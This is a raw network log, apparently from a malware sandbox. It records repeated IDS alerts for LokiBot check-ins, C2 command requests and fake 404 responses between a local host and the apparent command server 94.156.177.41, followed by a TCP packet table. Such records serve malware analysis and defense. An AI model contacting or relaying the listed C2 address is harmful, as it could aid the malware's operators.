                                                                                    2025-01-07T12:33:34.894254+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45010094.156.177.4180TCP
                                                                                    2025-01-07T12:33:34.894254+01002025381ET MALWARE LokiBot Checkin1192.168.2.45010094.156.177.4180TCP
                                                                                    2025-01-07T12:33:34.894254+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45010094.156.177.4180TCP
                                                                                    2025-01-07T12:33:35.663277+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45010094.156.177.4180TCP
                                                                                    2025-01-07T12:33:35.663277+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45010094.156.177.4180TCP
                                                                                    2025-01-07T12:33:35.668143+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450100TCP
                                                                                    2025-01-07T12:33:35.815203+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45010694.156.177.4180TCP
                                                                                    2025-01-07T12:33:35.815203+01002025381ET MALWARE LokiBot Checkin1192.168.2.45010694.156.177.4180TCP
                                                                                    2025-01-07T12:33:35.815203+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45010694.156.177.4180TCP
                                                                                    2025-01-07T12:33:36.542571+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45010694.156.177.4180TCP
                                                                                    2025-01-07T12:33:36.542571+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45010694.156.177.4180TCP
                                                                                    2025-01-07T12:33:36.547440+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450106TCP
                                                                                    2025-01-07T12:33:36.704614+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45011294.156.177.4180TCP
                                                                                    2025-01-07T12:33:36.704614+01002025381ET MALWARE LokiBot Checkin1192.168.2.45011294.156.177.4180TCP
                                                                                    2025-01-07T12:33:36.704614+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45011294.156.177.4180TCP
                                                                                    2025-01-07T12:33:37.462301+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45011294.156.177.4180TCP
                                                                                    2025-01-07T12:33:37.462301+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45011294.156.177.4180TCP
                                                                                    2025-01-07T12:33:37.467122+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450112TCP
                                                                                    2025-01-07T12:33:37.618568+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45011494.156.177.4180TCP
                                                                                    2025-01-07T12:33:37.618568+01002025381ET MALWARE LokiBot Checkin1192.168.2.45011494.156.177.4180TCP
                                                                                    2025-01-07T12:33:37.618568+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45011494.156.177.4180TCP
                                                                                    2025-01-07T12:33:38.351026+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45011494.156.177.4180TCP
                                                                                    2025-01-07T12:33:38.351026+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45011494.156.177.4180TCP
                                                                                    2025-01-07T12:33:38.356590+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450114TCP
                                                                                    2025-01-07T12:33:38.510581+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45011594.156.177.4180TCP
                                                                                    2025-01-07T12:33:38.510581+01002025381ET MALWARE LokiBot Checkin1192.168.2.45011594.156.177.4180TCP
                                                                                    2025-01-07T12:33:38.510581+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45011594.156.177.4180TCP
                                                                                    2025-01-07T12:33:39.277673+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45011594.156.177.4180TCP
                                                                                    2025-01-07T12:33:39.277673+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45011594.156.177.4180TCP
                                                                                    2025-01-07T12:33:39.284335+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450115TCP
                                                                                    2025-01-07T12:33:39.427169+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45011694.156.177.4180TCP
                                                                                    2025-01-07T12:33:39.427169+01002025381ET MALWARE LokiBot Checkin1192.168.2.45011694.156.177.4180TCP
                                                                                    2025-01-07T12:33:39.427169+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45011694.156.177.4180TCP
                                                                                    2025-01-07T12:33:40.149202+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45011694.156.177.4180TCP
                                                                                    2025-01-07T12:33:40.149202+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45011694.156.177.4180TCP
                                                                                    2025-01-07T12:33:40.154005+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450116TCP
                                                                                    2025-01-07T12:33:40.300156+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45011794.156.177.4180TCP
                                                                                    2025-01-07T12:33:40.300156+01002025381ET MALWARE LokiBot Checkin1192.168.2.45011794.156.177.4180TCP
                                                                                    2025-01-07T12:33:40.300156+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45011794.156.177.4180TCP
                                                                                    2025-01-07T12:33:41.026481+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45011794.156.177.4180TCP
                                                                                    2025-01-07T12:33:41.026481+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45011794.156.177.4180TCP
                                                                                    2025-01-07T12:33:41.031213+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450117TCP
                                                                                    2025-01-07T12:33:41.178680+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45011894.156.177.4180TCP
                                                                                    2025-01-07T12:33:41.178680+01002025381ET MALWARE LokiBot Checkin1192.168.2.45011894.156.177.4180TCP
                                                                                    2025-01-07T12:33:41.178680+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45011894.156.177.4180TCP
                                                                                    2025-01-07T12:33:42.069136+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45011894.156.177.4180TCP
                                                                                    2025-01-07T12:33:42.069136+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45011894.156.177.4180TCP
                                                                                    2025-01-07T12:33:42.073941+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450118TCP
                                                                                    2025-01-07T12:33:42.221421+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45011994.156.177.4180TCP
                                                                                    2025-01-07T12:33:42.221421+01002025381ET MALWARE LokiBot Checkin1192.168.2.45011994.156.177.4180TCP
                                                                                    2025-01-07T12:33:42.221421+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45011994.156.177.4180TCP
                                                                                    2025-01-07T12:33:42.943866+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45011994.156.177.4180TCP
                                                                                    2025-01-07T12:33:42.943866+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45011994.156.177.4180TCP
                                                                                    2025-01-07T12:33:42.948672+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450119TCP
                                                                                    2025-01-07T12:33:43.104720+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45012094.156.177.4180TCP
                                                                                    2025-01-07T12:33:43.104720+01002025381ET MALWARE LokiBot Checkin1192.168.2.45012094.156.177.4180TCP
                                                                                    2025-01-07T12:33:43.104720+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45012094.156.177.4180TCP
                                                                                    2025-01-07T12:33:43.909799+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45012094.156.177.4180TCP
                                                                                    2025-01-07T12:33:43.909799+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45012094.156.177.4180TCP
                                                                                    2025-01-07T12:33:43.915043+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450120TCP
                                                                                    2025-01-07T12:33:44.073014+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45012194.156.177.4180TCP
                                                                                    2025-01-07T12:33:44.073014+01002025381ET MALWARE LokiBot Checkin1192.168.2.45012194.156.177.4180TCP
                                                                                    2025-01-07T12:33:44.073014+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45012194.156.177.4180TCP
                                                                                    2025-01-07T12:33:44.821678+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45012194.156.177.4180TCP
                                                                                    2025-01-07T12:33:44.821678+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45012194.156.177.4180TCP
                                                                                    2025-01-07T12:33:44.826511+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450121TCP
                                                                                    2025-01-07T12:33:44.978438+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45012294.156.177.4180TCP
                                                                                    2025-01-07T12:33:44.978438+01002025381ET MALWARE LokiBot Checkin1192.168.2.45012294.156.177.4180TCP
                                                                                    2025-01-07T12:33:44.978438+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45012294.156.177.4180TCP
                                                                                    2025-01-07T12:33:45.694009+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45012294.156.177.4180TCP
                                                                                    2025-01-07T12:33:45.694009+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45012294.156.177.4180TCP
                                                                                    2025-01-07T12:33:45.698774+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450122TCP
                                                                                    2025-01-07T12:33:45.848723+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45012394.156.177.4180TCP
                                                                                    2025-01-07T12:33:45.848723+01002025381ET MALWARE LokiBot Checkin1192.168.2.45012394.156.177.4180TCP
                                                                                    2025-01-07T12:33:45.848723+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45012394.156.177.4180TCP
                                                                                    2025-01-07T12:33:46.585711+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45012394.156.177.4180TCP
                                                                                    2025-01-07T12:33:46.585711+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45012394.156.177.4180TCP
                                                                                    2025-01-07T12:33:46.590607+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450123TCP
                                                                                    2025-01-07T12:33:46.736292+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45012494.156.177.4180TCP
                                                                                    2025-01-07T12:33:46.736292+01002025381ET MALWARE LokiBot Checkin1192.168.2.45012494.156.177.4180TCP
                                                                                    2025-01-07T12:33:46.736292+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45012494.156.177.4180TCP
                                                                                    2025-01-07T12:33:47.641378+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45012494.156.177.4180TCP
                                                                                    2025-01-07T12:33:47.641378+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45012494.156.177.4180TCP
                                                                                    2025-01-07T12:33:47.646236+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450124TCP
                                                                                    2025-01-07T12:33:47.784973+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45012594.156.177.4180TCP
                                                                                    2025-01-07T12:33:47.784973+01002025381ET MALWARE LokiBot Checkin1192.168.2.45012594.156.177.4180TCP
                                                                                    2025-01-07T12:33:47.784973+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45012594.156.177.4180TCP
                                                                                    2025-01-07T12:33:48.495517+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45012594.156.177.4180TCP
                                                                                    2025-01-07T12:33:48.495517+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45012594.156.177.4180TCP
                                                                                    2025-01-07T12:33:48.501354+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450125TCP
                                                                                    2025-01-07T12:33:48.642095+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45012694.156.177.4180TCP
                                                                                    2025-01-07T12:33:48.642095+01002025381ET MALWARE LokiBot Checkin1192.168.2.45012694.156.177.4180TCP
                                                                                    2025-01-07T12:33:48.642095+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45012694.156.177.4180TCP
                                                                                    2025-01-07T12:33:49.400961+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45012694.156.177.4180TCP
                                                                                    2025-01-07T12:33:49.400961+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45012694.156.177.4180TCP
                                                                                    2025-01-07T12:33:49.405760+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450126TCP
                                                                                    2025-01-07T12:33:49.553437+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45012794.156.177.4180TCP
                                                                                    2025-01-07T12:33:49.553437+01002025381ET MALWARE LokiBot Checkin1192.168.2.45012794.156.177.4180TCP
                                                                                    2025-01-07T12:33:49.553437+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45012794.156.177.4180TCP
                                                                                    2025-01-07T12:33:50.308279+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45012794.156.177.4180TCP
                                                                                    2025-01-07T12:33:50.308279+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45012794.156.177.4180TCP
                                                                                    2025-01-07T12:33:50.313200+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450127TCP
                                                                                    2025-01-07T12:33:50.465759+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45012894.156.177.4180TCP
                                                                                    2025-01-07T12:33:50.465759+01002025381ET MALWARE LokiBot Checkin1192.168.2.45012894.156.177.4180TCP
                                                                                    2025-01-07T12:33:50.465759+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45012894.156.177.4180TCP
                                                                                    2025-01-07T12:33:51.192040+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45012894.156.177.4180TCP
                                                                                    2025-01-07T12:33:51.192040+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45012894.156.177.4180TCP
                                                                                    2025-01-07T12:33:51.196923+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450128TCP
                                                                                    2025-01-07T12:33:51.347194+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45012994.156.177.4180TCP
                                                                                    2025-01-07T12:33:51.347194+01002025381ET MALWARE LokiBot Checkin1192.168.2.45012994.156.177.4180TCP
                                                                                    2025-01-07T12:33:51.347194+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45012994.156.177.4180TCP
                                                                                    2025-01-07T12:33:52.077623+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45012994.156.177.4180TCP
                                                                                    2025-01-07T12:33:52.077623+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45012994.156.177.4180TCP
                                                                                    2025-01-07T12:33:52.082481+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450129TCP
                                                                                    2025-01-07T12:33:52.222675+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45013094.156.177.4180TCP
                                                                                    2025-01-07T12:33:52.222675+01002025381ET MALWARE LokiBot Checkin1192.168.2.45013094.156.177.4180TCP
                                                                                    2025-01-07T12:33:52.222675+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45013094.156.177.4180TCP
                                                                                    2025-01-07T12:33:53.256311+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45013094.156.177.4180TCP
                                                                                    2025-01-07T12:33:53.256311+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45013094.156.177.4180TCP
                                                                                    2025-01-07T12:33:53.261119+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450130TCP
                                                                                    2025-01-07T12:33:53.621252+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45013194.156.177.4180TCP
                                                                                    2025-01-07T12:33:53.621252+01002025381ET MALWARE LokiBot Checkin1192.168.2.45013194.156.177.4180TCP
                                                                                    2025-01-07T12:33:53.621252+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45013194.156.177.4180TCP
                                                                                    2025-01-07T12:33:54.360403+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45013194.156.177.4180TCP
                                                                                    2025-01-07T12:33:54.360403+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45013194.156.177.4180TCP
                                                                                    2025-01-07T12:33:54.365193+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450131TCP
                                                                                    2025-01-07T12:33:54.519173+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45013294.156.177.4180TCP
                                                                                    2025-01-07T12:33:54.519173+01002025381ET MALWARE LokiBot Checkin1192.168.2.45013294.156.177.4180TCP
                                                                                    2025-01-07T12:33:54.519173+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45013294.156.177.4180TCP
                                                                                    2025-01-07T12:33:55.263205+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45013294.156.177.4180TCP
                                                                                    2025-01-07T12:33:55.263205+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45013294.156.177.4180TCP
                                                                                    2025-01-07T12:33:55.268000+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450132TCP
                                                                                    2025-01-07T12:33:55.412870+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45013394.156.177.4180TCP
                                                                                    2025-01-07T12:33:55.412870+01002025381ET MALWARE LokiBot Checkin1192.168.2.45013394.156.177.4180TCP
                                                                                    2025-01-07T12:33:55.412870+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45013394.156.177.4180TCP
                                                                                    2025-01-07T12:33:56.154405+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45013394.156.177.4180TCP
                                                                                    2025-01-07T12:33:56.154405+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45013394.156.177.4180TCP
                                                                                    2025-01-07T12:33:56.172324+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450133TCP
                                                                                    2025-01-07T12:33:56.462921+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45013494.156.177.4180TCP
                                                                                    2025-01-07T12:33:56.462921+01002025381ET MALWARE LokiBot Checkin1192.168.2.45013494.156.177.4180TCP
                                                                                    2025-01-07T12:33:56.462921+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45013494.156.177.4180TCP
                                                                                    2025-01-07T12:33:57.175145+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45013494.156.177.4180TCP
                                                                                    2025-01-07T12:33:57.175145+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45013494.156.177.4180TCP
                                                                                    2025-01-07T12:33:57.179973+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450134TCP
                                                                                    2025-01-07T12:33:57.340598+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45013594.156.177.4180TCP
                                                                                    2025-01-07T12:33:57.340598+01002025381ET MALWARE LokiBot Checkin1192.168.2.45013594.156.177.4180TCP
                                                                                    2025-01-07T12:33:57.340598+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45013594.156.177.4180TCP
                                                                                    2025-01-07T12:33:58.088991+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45013594.156.177.4180TCP
                                                                                    2025-01-07T12:33:58.088991+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45013594.156.177.4180TCP
                                                                                    2025-01-07T12:33:58.093795+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450135TCP
                                                                                    2025-01-07T12:33:58.239632+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45013694.156.177.4180TCP
                                                                                    2025-01-07T12:33:58.239632+01002025381ET MALWARE LokiBot Checkin1192.168.2.45013694.156.177.4180TCP
                                                                                    2025-01-07T12:33:58.239632+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45013694.156.177.4180TCP
                                                                                    2025-01-07T12:33:58.979379+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45013694.156.177.4180TCP
                                                                                    2025-01-07T12:33:58.979379+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45013694.156.177.4180TCP
                                                                                    2025-01-07T12:33:58.984297+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450136TCP
                                                                                    2025-01-07T12:33:59.128389+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45013794.156.177.4180TCP
                                                                                    2025-01-07T12:33:59.128389+01002025381ET MALWARE LokiBot Checkin1192.168.2.45013794.156.177.4180TCP
                                                                                    2025-01-07T12:33:59.128389+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45013794.156.177.4180TCP
                                                                                    2025-01-07T12:33:59.832529+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45013794.156.177.4180TCP
                                                                                    2025-01-07T12:33:59.832529+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45013794.156.177.4180TCP
                                                                                    2025-01-07T12:33:59.837375+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450137TCP
                                                                                    2025-01-07T12:33:59.979403+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45013894.156.177.4180TCP
                                                                                    2025-01-07T12:33:59.979403+01002025381ET MALWARE LokiBot Checkin1192.168.2.45013894.156.177.4180TCP
                                                                                    2025-01-07T12:33:59.979403+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45013894.156.177.4180TCP
                                                                                    2025-01-07T12:34:00.722379+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45013894.156.177.4180TCP
                                                                                    2025-01-07T12:34:00.722379+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45013894.156.177.4180TCP
                                                                                    2025-01-07T12:34:00.727211+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450138TCP
                                                                                    2025-01-07T12:34:01.024157+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45013994.156.177.4180TCP
                                                                                    2025-01-07T12:34:01.024157+01002025381ET MALWARE LokiBot Checkin1192.168.2.45013994.156.177.4180TCP
                                                                                    2025-01-07T12:34:01.024157+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45013994.156.177.4180TCP
                                                                                    2025-01-07T12:34:01.830408+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45013994.156.177.4180TCP
                                                                                    2025-01-07T12:34:01.830408+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45013994.156.177.4180TCP
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Jan 7, 2025 12:32:00.784879923 CET4973580192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:32:00.789793015 CET804973594.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:32:00.789906025 CET4973580192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:32:00.792104959 CET4973580192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:32:00.796874046 CET804973594.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:32:00.796955109 CET4973580192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:32:00.801721096 CET804973594.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:32:01.519831896 CET804973594.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:32:01.519906044 CET804973594.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:32:01.519942999 CET4973580192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:32:01.519984961 CET4973580192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:32:01.524682999 CET804973594.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:32:01.742580891 CET4973780192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:32:01.747385979 CET804973794.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:32:01.747620106 CET4973780192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:32:01.749722958 CET4973780192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:32:01.754550934 CET804973794.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:32:01.754698992 CET4973780192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:32:01.759449959 CET804973794.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:32:02.466386080 CET804973794.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:32:02.466466904 CET804973794.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:32:02.466654062 CET4973780192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:32:02.466944933 CET4973780192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:32:02.471434116 CET804973794.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:32:02.538327932 CET4973980192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:32:02.543133974 CET804973994.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:32:02.543251991 CET4973980192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:32:02.545078993 CET4973980192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:32:02.549812078 CET804973994.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:32:02.549907923 CET4973980192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:32:02.554666042 CET804973994.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:32:03.274969101 CET804973994.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:32:03.275142908 CET804973994.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:32:03.275190115 CET4973980192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:32:03.311649084 CET4973980192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:32:03.316472054 CET804973994.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:32:03.590361118 CET4974080192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:32:03.595285892 CET804974094.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:32:03.595364094 CET4974080192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:32:03.597286940 CET4974080192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:32:03.602046967 CET804974094.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:32:03.602113962 CET4974080192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:32:03.606889963 CET804974094.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:32:04.338901043 CET804974094.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:32:04.338921070 CET804974094.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:32:04.338994980 CET4974080192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:32:04.339142084 CET4974080192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:32:04.346343994 CET804974094.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:32:04.478646994 CET4974180192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:32:04.483460903 CET804974194.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:32:04.483536959 CET4974180192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:32:04.485605955 CET4974180192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:32:04.490382910 CET804974194.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:32:04.490437984 CET4974180192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:32:04.495224953 CET804974194.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:32:05.248064995 CET804974194.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:32:05.248744011 CET4974180192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:32:05.248794079 CET804974194.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:32:05.248902082 CET4974180192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:32:05.262504101 CET804974194.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:32:05.400047064 CET4974280192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:32:05.404875994 CET804974294.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:32:05.405174971 CET4974280192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:32:05.407216072 CET4974280192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:32:05.412033081 CET804974294.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:32:05.412187099 CET4974280192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:32:05.416913986 CET804974294.156.177.41192.168.2.4
